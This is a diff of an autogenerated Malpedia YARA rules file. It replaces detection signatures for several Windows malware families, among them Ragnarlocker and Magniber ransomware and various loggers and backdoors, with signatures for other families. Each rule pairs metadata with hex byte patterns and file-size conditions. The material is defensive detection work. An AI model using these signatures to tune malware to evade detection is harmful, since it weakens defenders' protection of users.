-		7 of them and filesize < 1097728
+		7 of them and filesize < 1063936
 }
-rule MALPEDIA_Win_Coreshell_Auto : FILE
+rule MALPEDIA_Win_Rarog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68c75bba-5c1e-5e9d-b9a1-c2a54cb41bad"
+		id = "f5f8ab57-da39-59fd-96e2-5478facae854"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coreshell_auto.yar#L1-L414"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rarog_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "964533465ea71e27159b30ec40d2ad04ff56c4993e1303c6d09339c487e78d9b"
+		logic_hash = "631ab74dfbbcce858a4c6605f35ed1c081c9a6b77767d5321714353e8fbb62e4"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94070,69 +94259,32 @@ rule MALPEDIA_Win_Coreshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 ff15???????? 83c40c 3bc6 }
-		$sequence_1 = { 6810270000 ff15???????? be06000000 e8???????? 85c0 7401 4e }
-		$sequence_2 = { 68???????? 52 ffd7 ffd0 }
-		$sequence_3 = { 6a00 ff15???????? 8bf0 ff15???????? 50 68???????? 68???????? }
-		$sequence_4 = { 8d041e 50 57 6a08 51 ff15???????? 8bf8 }
-		$sequence_5 = { 6804010000 6a08 8b15???????? 52 ff15???????? }
-		$sequence_6 = { 8b0d???????? 8b15???????? 6a01 51 68???????? 52 }
-		$sequence_7 = { c20400 50 a1???????? 6a00 50 }
-		$sequence_8 = { e8???????? 85c0 7402 eb14 c745f000000000 68e0930400 ff15???????? }
-		$sequence_9 = { 8d4c2400 56 51 6a00 }
-		$sequence_10 = { 50 a3???????? ffd6 a3???????? }
-		$sequence_11 = { 8bf1 8b4604 85c0 7407 50 ff15???????? 8b36 }
-		$sequence_12 = { ff15???????? ffd0 85c0 7508 }
-		$sequence_13 = { 8b0d???????? 52 50 57 68???????? }
-		$sequence_14 = { 68???????? 6800080000 8d85fcefffff 50 }
-		$sequence_15 = { 68???????? 50 ffd6 6a00 6a00 6a00 }
-		$sequence_16 = { 8d442404 6a00 8bf1 50 c744240c00000000 ff15???????? }
-		$sequence_17 = { 52 ff15???????? 8b0d???????? 8bf0 8b5c241c 8d041e }
-		$sequence_18 = { 50 68???????? 68???????? 8985f0fdffff 8d85f4fdffff 6804010000 50 }
-		$sequence_19 = { 03cf 880431 fec3 ebe6 }
-		$sequence_20 = { 52 e8???????? 83c408 33c0 8b4df0 64890d00000000 }
-		$sequence_21 = { 81e1ffff0000 81e1ffff0000 81e1ff000000 81e1ff000000 }
-		$sequence_22 = { 5d 83c8ff 5b c20c00 03f7 }
-		$sequence_23 = { 8b8dd8edffff 51 8d95f4edffff 52 }
-		$sequence_24 = { 81e2ffff0000 81e2ffff0000 c1ea08 81e2ff000000 }
-		$sequence_25 = { e8???????? 8be8 8b442410 50 e8???????? }
-		$sequence_26 = { 6888130000 ff15???????? c745f000000000 c745f400000000 }
-		$sequence_27 = { 25ffff0000 0fb7c8 c1e908 81e1ff000000 0fb6d1 52 }
-		$sequence_28 = { ff15???????? 83c414 8d95f4fdffff 52 ff15???????? }
-		$sequence_29 = { 56 51 56 6a01 }
-		$sequence_30 = { ff15???????? ba00080000 2bd0 52 8d85fcefffff }
-		$sequence_31 = { a1???????? 50 68???????? 8b0d???????? 51 ff15???????? ffd0 }
-		$sequence_32 = { 0305???????? 50 ff15???????? a1???????? }
-		$sequence_33 = { ffd6 ffd0 68???????? a3???????? }
-		$sequence_34 = { 68???????? 51 ffd3 ffd0 }
-		$sequence_35 = { 5f 5b 5d c3 b81c000000 e8???????? 89e0 }
-		$sequence_36 = { 29d6 0faff0 31d2 f7f6 }
-		$sequence_37 = { 5f 5d c3 89e0 c70010270000 }
-		$sequence_38 = { 68???????? 53 a3???????? ffd6 68???????? a3???????? ffd7 }
-		$sequence_39 = { 29d6 01f0 a3???????? e9???????? }
-		$sequence_40 = { 690006000000 0306 8b4dcc 8b09 }
-		$sequence_41 = { a3???????? ffd7 8bd8 68???????? }
-		$sequence_42 = { bf04010000 57 6a08 ff35???????? ff15???????? }
-		$sequence_43 = { 6689fb 0fb7fb c1ef08 81e7ff000000 }
-		$sequence_44 = { 8908 8b00 8b5004 8b35???????? }
-		$sequence_45 = { 56 57 8b3d???????? 68???????? ffd7 8b35???????? 68???????? }
-		$sequence_46 = { 8908 8b15???????? 89d6 81c609000000 }
+		$sequence_0 = { 8b8c246c030000 33cc e8???????? 8be5 5d c3 55 }
+		$sequence_1 = { 8d45b8 50 8d4d24 e8???????? 83781408 7202 8b00 }
+		$sequence_2 = { 89a504ffffff c741140f000000 895910 68???????? 8819 e8???????? e8???????? }
+		$sequence_3 = { 8bc8 8bdf c645fc01 e8???????? c645fc02 c70424???????? 50 }
+		$sequence_4 = { c645fc22 e8???????? 8bd8 8db5bcfbffff c645fc23 e8???????? 8bf8 }
+		$sequence_5 = { ffb510ffffff 8d8d48ffffff e8???????? 8d9d48ffffff e8???????? 8b8510ffffff }
+		$sequence_6 = { 8bc4 89a550ffffff 50 e8???????? 8b8d5cffffff c645fc17 }
+		$sequence_7 = { 884597 c645fc04 e8???????? 83ec1c }
+		$sequence_8 = { ff7518 8845bc ff7514 8d45b0 ff75bc ff75d0 50 }
+		$sequence_9 = { 83c40c 8d8dbcfbffff 51 8bc8 }
 
 	condition:
-		7 of them and filesize < 303100
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Ragnarlocker_Auto : FILE
+rule MALPEDIA_Win_Eagerbee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "115610a4-debf-5e53-866c-588d0e4a674d"
+		id = "7a126278-7eb1-5d08-9b25-74b27f2a3312"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ragnarlocker_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eagerbee_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "6d88f5a9935c94f31e5ef388da569a4f1a15523f9d92a2b5d9dd3611cf9ee236"
+		logic_hash = "a3d744962e3184242280e8a1606b8e9d39f3a62e4bfb278481827290e0059489"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94146,32 +94298,32 @@ rule MALPEDIA_Win_Ragnarlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7da4 0facd106 33fe c1ea06 33d9 8b4da8 33fa }
-		$sequence_1 = { c1e017 0bd8 8b45cc 0bf9 8b4dd4 33d2 }
-		$sequence_2 = { 33d0 03de 8b4dfc 8b75f8 8bc6 13fa c745bc00000000 }
-		$sequence_3 = { 8bf1 0facd113 c1e60d c1ea13 0bf2 895da8 8b957cffffff }
-		$sequence_4 = { 33db 0bd9 8975a4 8b8d50ffffff 8bfa 0fa4ca03 c1ef1d }
-		$sequence_5 = { 56 8b75f8 56 6a03 6a3b 57 ff15???????? }
-		$sequence_6 = { 8945e0 8b4594 8945e4 8b4590 8945e8 8b458c 8945c0 }
-		$sequence_7 = { 99 0bf2 c1e308 0bd8 0fb64143 0fa4de08 }
-		$sequence_8 = { 0bd8 0fb6410f 0fa4de08 8b4d98 99 0bf2 c1e308 }
-		$sequence_9 = { c1ea0e 3175fc 0bfa 8b75dc 33df 8b7de0 f7d6 }
+		$sequence_0 = { 3986f4160000 0f8576ffffff 8b8684000000 85c0 7809 488bd0 }
+		$sequence_1 = { 488d4c0422 44896309 e8???????? 8bd0 e9???????? 488d4c0421 e8???????? }
+		$sequence_2 = { 44396818 0f84b7010000 488d1de463ffff beffff0000 bd00010000 e9???????? 4439af90000000 }
+		$sequence_3 = { 885c247d 488b08 488d542470 ff5058 b9fb010000 488bd8 e8???????? }
+		$sequence_4 = { c684242b0100006d 4088bc242c010000 4088b4242d010000 48397308 0f84ae030000 488b05???????? c684249000000073 }
+		$sequence_5 = { 33c9 8bd7 41b800300000 ff15???????? 8b5500 }
+		$sequence_6 = { c644243432 c64424352e c644243664 884c2438 488d4c2430 c644243900 }
+		$sequence_7 = { 488d8c24e0040000 48894c2420 488b8c24e8040000 4c8bc3 ba01000000 ffd0 488b05???????? }
+		$sequence_8 = { 8a8424c0000000 8b9c24a8000000 488bbc2498000000 88442450 488b8424b8000000 498943e0 8a8424b0000000 }
+		$sequence_9 = { 4883ec38 83fa01 7528 488364242800 8364242000 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 422912
 }
-rule MALPEDIA_Win_Pslogger_Auto : FILE
+rule MALPEDIA_Win_Whitebird_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7125bcf7-61fe-59fe-bcb6-1726a032b5b5"
+		id = "1f55b3f7-b049-5ddb-a603-f3dac3229eba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pslogger_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whitebird_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "f827a0de7cefc58a148c7605b546e1b2c29f64eac98a4dd15fd09ff9985d232c"
+		logic_hash = "084753ca04c12bd29943e734768bdc4d7b6a6a5445a6b9fa8738444da44f9e8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94185,38 +94337,37 @@ rule MALPEDIA_Win_Pslogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bc8 e8???????? 4863f0 }
-		$sequence_1 = { 4885c9 7406 ff15???????? 4883c318 }
-		$sequence_2 = { 8d4601 4863e8 488bcd e8???????? }
-		$sequence_3 = { 483bc8 740e 4885c9 7406 }
-		$sequence_4 = { ff15???????? b801000000 488b8c2488000000 4833cc e8???????? }
-		$sequence_5 = { 498bcc e8???????? 33d2 41b8b80b0000 498bcc }
-		$sequence_6 = { c3 488b0d???????? 33d2 ff15???????? 488b0d???????? 33d2 ff15???????? }
-		$sequence_7 = { b910000000 ff15???????? 6685c0 7910 b914000000 ff15???????? 6685c0 }
-		$sequence_8 = { 895c2414 ff35???????? ffd6 e9???????? 85c9 }
-		$sequence_9 = { 8bf0 83c408 85f6 0f84e8000000 8bce 8d5101 }
-		$sequence_10 = { 85c0 7e25 66660f1f840000000000 8894373d1c0000 b801000000 }
-		$sequence_11 = { 393b 0f45f8 33c9 89bd58fbffff 0f1f4000 }
-		$sequence_12 = { 6bc830 8b049588b14200 f644082801 7414 8d4508 8945fc 8d45fc }
-		$sequence_13 = { 68???????? 50 e8???????? 8d842470030000 68???????? 50 e8???????? }
-		$sequence_14 = { 85c0 0f8568fcffff 668b8594fbffff 83431810 }
-		$sequence_15 = { 58 668906 8b048d88b14200 6a0a 8854382a }
+		$sequence_0 = { eb09 80f92f 0f95c1 80c13f }
+		$sequence_1 = { 488b83e8140000 488d15a7f2ffff 41b82f000000 488901 488b83f0140000 }
+		$sequence_2 = { 56 e8???????? 59 8945d4 85c0 0f84f5000000 6a00 }
+		$sequence_3 = { 66898d56ffffff 59 6689855cffffff 66898d58ffffff 8bc8 33c0 }
+		$sequence_4 = { 74ea 3918 7467 8b85f4feffff }
+		$sequence_5 = { 7cd5 41c60300 4863c2 4c2bd8 4c891e }
+		$sequence_6 = { 4c8d4c2440 458bc4 488bd0 488bcd }
+		$sequence_7 = { 66898572ffffff 66898d68ffffff 59 6a73 66898d6affffff 8bc8 58 }
+		$sequence_8 = { 488d0dacc9ffff 41b808020000 ff15???????? 4c8d5c2478 488d8424b0000000 }
+		$sequence_9 = { 8d43f5 66898c2400010000 66898424fe000000 8d43f6 6689942408010000 }
+		$sequence_10 = { ffd0 8d4584 50 6802000080 }
+		$sequence_11 = { 41bc00200000 498bd4 488d8c2450050000 e8???????? 33c0 488bcb }
+		$sequence_12 = { 8985b8fcffff 8b859cfcffff 0fb74002 83c40c 50 c785b4fcffff06000000 ff15???????? }
+		$sequence_13 = { 83fe1a 0f8c77ffffff 488d4c2450 ff15???????? 8b542460 8b442458 }
+		$sequence_14 = { 6806020000 50 668985f4fdffff 8d85f6fdffff 50 e8???????? 8bc7 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Crutch_Auto : FILE
+rule MALPEDIA_Win_Mortalkombat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3e20e20b-31c5-5834-8ab6-1f56ddff6199"
+		id = "2926ed70-9658-5024-99d2-e9010cd78f8a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crutch_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mortalkombat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f4a23c9ddcadc5cf9e865fc280dcc92eecf1924dce5c0d12173bb5cf5ba3e418"
+		logic_hash = "6719ab7cb4e15bf8e439d94e5987475ec5045761b54a9759e4f94419dacc6908"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94230,32 +94381,32 @@ rule MALPEDIA_Win_Crutch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5608 50 52 e8???????? 50 68???????? 56 }
-		$sequence_1 = { c7861840000001000000 e8???????? 83c40c eb55 8b8608400000 68???????? 68???????? }
-		$sequence_2 = { 771d 0fb68938370210 ff248d30370210 8b148500810610 52 68???????? eb19 }
-		$sequence_3 = { 762d 8b4c2444 390f 7560 8bd1 56 52 }
-		$sequence_4 = { 51 e8???????? 83c404 85c0 740d c744245c2a000000 e9???????? }
-		$sequence_5 = { 33cc e8???????? 81c4a8090000 c3 663b742414 763a 8b4c2410 }
-		$sequence_6 = { 8b442428 8b742420 8b38 81c630050000 e8???????? 5f 5e }
-		$sequence_7 = { ff7580 e8???????? 83c404 6a01 6a2f 53 e8???????? }
-		$sequence_8 = { e9???????? 8b44240c 68???????? 50 e8???????? 83c408 e9???????? }
-		$sequence_9 = { 52 e8???????? 8bf0 83c408 85f6 750f 5e }
+		$sequence_0 = { 8d85e8feffff 50 68???????? e8???????? 85c0 0f849c020000 8d85e8feffff }
+		$sequence_1 = { c745e800000000 8d45d0 50 e8???????? c745b02c010000 c745ac69000000 }
+		$sequence_2 = { 7516 6a10 68???????? 68???????? ff7508 e8???????? }
+		$sequence_3 = { 7401 41 8b35???????? 8bfe 33d2 83fa10 7502 }
+		$sequence_4 = { 68???????? e8???????? 68???????? 6800020000 e8???????? }
+		$sequence_5 = { 33ce 033d???????? 33cf 03d1 81c3b979379e 8bca }
+		$sequence_6 = { 6a00 e8???????? ff0d???????? 6801010000 }
+		$sequence_7 = { 751e 68???????? 68???????? e8???????? 68???????? e8???????? c60000 }
+		$sequence_8 = { 837d0c01 0f85a6010000 833d????????00 7506 ff0d???????? 68???????? 68???????? }
+		$sequence_9 = { 0fb605???????? 83f801 7511 68???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 1067008
+		7 of them and filesize < 1224704
 }
-rule MALPEDIA_Win_Magniber_Auto : FILE
+rule MALPEDIA_Win_Cherry_Picker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2010ff15-6b80-529a-a5cd-f6820259a96c"
+		id = "a7caa2a0-b6b8-580c-adee-e174a6220843"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.magniber_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cherry_picker_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "40cc2b100a2166758d1bade12df1107c6219e6f30fc93c01403c3eb3fe63bfd1"
+		logic_hash = "576fc4aca504b01489ce7bd7347bbe12054a63e779c96e3d35219ad0c56e8479"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94269,38 +94420,32 @@ rule MALPEDIA_Win_Magniber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c78514fdffff38994000 c78518fdffff40994000 c7851cfdffff48994000 c78520fdffff54994000 c78524fdffff60994000 c78528fdffff68994000 }
-		$sequence_1 = { 83c404 8945fc 837dfc00 0f84d7000000 68???????? 8b45fc }
-		$sequence_2 = { 8b45f8 8b8c8548ffffff 51 8b55f0 52 }
-		$sequence_3 = { 0f8462010000 8b55ec 52 ff15???????? 83f801 }
-		$sequence_4 = { c785fcfcffff08994000 c78500fdffff10994000 c78504fdffff18994000 c78508fdffff20994000 c7850cfdffff28994000 c78510fdffff30994000 }
-		$sequence_5 = { 7505 e9???????? 8b4df8 3b4df0 7307 }
-		$sequence_6 = { 6a00 6a03 6800000080 8b4d10 51 }
-		$sequence_7 = { 55 8bec 51 8b4508 83b86804000000 741b 8b4d08 }
-		$sequence_8 = { d331 4e4e54 70ac 52 f8 a6 }
-		$sequence_9 = { 097934 50 5e 5a 3558e9e633 }
-		$sequence_10 = { bb72657959 a1????????ba30f7a3 873428 de9d164df944 ee aa }
-		$sequence_11 = { 7f4c c82cd1c6 1a32 b636 }
-		$sequence_12 = { 21746c2e 4834b0 184026 e221 a1????????05eef081 e0f8 }
-		$sequence_13 = { 4baa 055457541d e9???????? bc12819787 bbdd81d473 ba2326dc05 645f }
-		$sequence_14 = { 32cb 5a b3b1 3e6c 21746c2e 4834b0 184026 }
-		$sequence_15 = { 283d98b7a0e5 7f9b 0b733e fd 6acb 199335632362 }
+		$sequence_0 = { ffd3 68???????? 56 8944242c ffd3 68???????? }
+		$sequence_1 = { 8d442428 50 ff542420 8b442420 }
+		$sequence_2 = { 8bf0 8bd1 83c408 2bf2 8a11 88140e 41 }
+		$sequence_3 = { 68???????? 68???????? a3???????? ffd6 69c0e8030000 }
+		$sequence_4 = { ff15???????? a3???????? 85c0 7512 68???????? 50 }
+		$sequence_5 = { a3???????? ffd6 68???????? 6a3c }
+		$sequence_6 = { 8bf0 0fbec9 81e6ff000000 33f1 8a4a01 42 c1f808 }
+		$sequence_7 = { 68e8030000 68???????? 68???????? a3???????? }
+		$sequence_8 = { 68???????? 68e8030000 68???????? 68???????? a3???????? }
+		$sequence_9 = { 68???????? 56 8944242c ffd3 68???????? }
 
 	condition:
-		7 of them and filesize < 117760
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Anel_Auto : FILE
+rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6aaa2dab-4b34-505d-ab57-a83be80c60ae"
+		id = "b8be2926-4142-5b9c-963d-8827c1d257eb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anel_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphical_neutrino_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "bf88932655884d72c230c9a3ca2d9886c485937f46465847549f25d9f3a65ea5"
+		logic_hash = "738cd6fc4267dd6a5687776cc638194fdfe1e78d0e84383b17d6f440ed210297"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94314,32 +94459,32 @@ rule MALPEDIA_Win_Anel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebc4 395dc4 7515 8b4594 83c0c8 50 8d4580 }
-		$sequence_1 = { 83781410 897810 7202 8b00 c60000 39bb3c020000 }
-		$sequence_2 = { 7403 33db 43 899fd4010000 6a01 33ff 8d750c }
-		$sequence_3 = { 53 8d45c4 33ff 50 895dfc 47 6802000080 }
-		$sequence_4 = { 7477 03fe 57 8d857cffffff 50 53 e8???????? }
-		$sequence_5 = { 68???????? 50 e8???????? 83c410 8d45d0 50 e8???????? }
-		$sequence_6 = { 6a00 8bd0 8d8c24b0000000 c684245c01000005 e8???????? 53 33ff }
-		$sequence_7 = { 837f1410 7202 8b3f 8d442450 50 57 e8???????? }
-		$sequence_8 = { 8d7dd0 a5 a5 a5 a5 8b75f0 8bfb }
-		$sequence_9 = { 837f1410 7204 8b07 eb02 8bc7 8d3418 56 }
+		$sequence_0 = { 57 56 53 498b18 458b5808 }
+		$sequence_1 = { e8???????? 4c89e1 4c89f2 4c8d4010 }
+		$sequence_2 = { 8b6c242c 48637c2428 8d743d00 39f7 7f2b 83fe0f }
+		$sequence_3 = { 83c030 83c230 8806 488d4602 885601 }
+		$sequence_4 = { 488d8424d8020000 4c8dbc24c8020000 48898424c8020000 488d442460 }
+		$sequence_5 = { 488b742470 4c8b7c2450 8a05???????? 84c0 }
+		$sequence_6 = { 7518 488b5108 48c1e004 480302 }
+		$sequence_7 = { 4863ee 4d89e0 488d4c2b02 e8???????? 488d5302 b030 89f1 }
+		$sequence_8 = { 4c8b4c2438 eb26 4584f6 750e 488b17 428a1422 88541d5a }
+		$sequence_9 = { 4885d2 0f840d020000 8a02 ffc8 3c01 0f8701020000 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 674816
 }
-rule MALPEDIA_Win_Woolger_Auto : FILE
+rule MALPEDIA_Win_Geminiduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "69dafade-30c5-5734-830c-150b438e6d59"
+		id = "ba57e2c8-93bd-55ac-a9e9-1b7d9180b057"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.woolger_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.geminiduke_auto.yar#L1-L149"
 		license_url = "N/A"
-		logic_hash = "a68ced9b21a66c947cc315eb8f76a9ad3604356e88ce1c4ffa9af9c48a2ada10"
+		logic_hash = "19a3524ebf5f0547a75168cd2fc0d4ded0d15d189661f967133afc45a2ebe1fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94353,32 +94498,36 @@ rule MALPEDIA_Win_Woolger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 46 8b5510 52 6a00 ff15???????? }
-		$sequence_1 = { ff15???????? 6800040000 8bf0 e8???????? 83c404 }
-		$sequence_2 = { 0f84e6000000 3da5000000 0f84db000000 83f85b 0f84cb000000 }
-		$sequence_3 = { 8b07 83f808 750a be???????? e9???????? }
-		$sequence_4 = { e9???????? 83f80d 750a be???????? e9???????? 83f814 }
-		$sequence_5 = { 750a be???????? e9???????? 83f828 750a be???????? }
-		$sequence_6 = { 0f848e000000 56 57 b980000000 8db5fcfdffff bf???????? }
-		$sequence_7 = { 57 0fb7d6 6a02 52 ff15???????? }
-		$sequence_8 = { be???????? e9???????? 83f809 750a be???????? e9???????? 83f80a }
-		$sequence_9 = { 83f828 750a be???????? e9???????? 83f82c 750a be???????? }
+		$sequence_0 = { e8???????? 83c404 50 6801000080 ff15???????? 85c0 7407 }
+		$sequence_1 = { 8b7c2410 8b442414 8b4c2418 f3aa 5f 59 }
+		$sequence_2 = { 52 6819000200 6a00 68???????? e8???????? 83c404 50 }
+		$sequence_3 = { 50 51 57 8b7c2410 }
+		$sequence_4 = { 034590 03c8 894dd0 8b45f8 }
+		$sequence_5 = { 034584 8b8d64ffffff c1e907 8b9564ffffff c1e219 0bca 8b9564ffffff }
+		$sequence_6 = { 034590 8b8d70ffffff c1e907 8b9570ffffff }
+		$sequence_7 = { 03459c 03c8 894ddc 8b45fc }
+		$sequence_8 = { 33d2 f7f3 668907 8bc2 }
+		$sequence_9 = { 83c1d8 e9???????? 53 56 57 32db }
+		$sequence_10 = { 80f909 7704 8ac1 0430 }
+		$sequence_11 = { 8a6834 0fb65036 8a4835 c1e108 0bca 0fb65037 }
+		$sequence_12 = { 8ad1 80ea0a 80fa05 7705 }
+		$sequence_13 = { 66894704 8bc2 c1e010 668b4602 33d2 f7f3 }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Yarat_Auto : FILE
+rule MALPEDIA_Win_Eyservice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c5e6c743-0bb4-5ded-85f6-7e273a746dba"
+		id = "01143abf-4326-5001-b471-74ce2f23b942"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yarat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eyservice_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "9bcd9db0a35387b5ff289ffde342821469357bc27585eec725313cf57fac8b79"
+		logic_hash = "cec2c9ebe5b9e4768a39fd8dee155ccbac651c379b500243ead7740363768937"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94392,32 +94541,32 @@ rule MALPEDIA_Win_Yarat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b07 51 03f0 52 56 e8???????? 8b8564feffff }
-		$sequence_1 = { 8b7d08 33f6 33db 85ff 7439 8bf7 8d4e01 }
-		$sequence_2 = { c1ca03 663bf5 84eb 81f21b6f5a16 f7da f5 81fede018b2e }
-		$sequence_3 = { 8b3f 85ff 75d7 837c241c00 8b3d???????? 754f 6804010000 }
-		$sequence_4 = { f5 81c702000000 6685f1 0fadc2 f6d0 0f42c5 0fc8 }
-		$sequence_5 = { b90a000000 5f 5e 89889c0a0000 8bc3 5b 8be5 }
-		$sequence_6 = { e8???????? 83c408 eb02 33c0 898388050000 80be3e10000000 8945f8 }
-		$sequence_7 = { 8bec 8b4d08 85c9 7413 8b8148050000 8b4024 85c0 }
-		$sequence_8 = { e8???????? 8bc6 83c418 0b45e8 0f858d000000 eb78 6a02 }
-		$sequence_9 = { 869d56f9247d 9e 2490 7f7c ec 96 ac }
+		$sequence_0 = { e8???????? 8d4c2408 8bf0 c7842460080000ffffffff e8???????? }
+		$sequence_1 = { 0f85e5000000 c70600000000 c70702000000 e9???????? 83f85a 0f85cb000000 }
+		$sequence_2 = { 83bef800000000 747c 8d4c2408 e8???????? a1???????? 8d4c2408 51 }
+		$sequence_3 = { 50 b9???????? c7442454ffffffff e8???????? 46 3bf7 }
+		$sequence_4 = { 56 8bc8 e8???????? eb02 33c0 89442410 8d442410 }
+		$sequence_5 = { 5f 5e 59 c21000 53 8bfb 53 }
+		$sequence_6 = { 83c404 894de8 c645fc01 3bce 7417 e8???????? 8b4df4 }
+		$sequence_7 = { ffd3 8d442434 68???????? 50 ff15???????? 68???????? 8d8c2444010000 }
+		$sequence_8 = { 888654720000 66099652720000 3c08 76bc 0fb78652720000 808654720000f8 0fb7c8 }
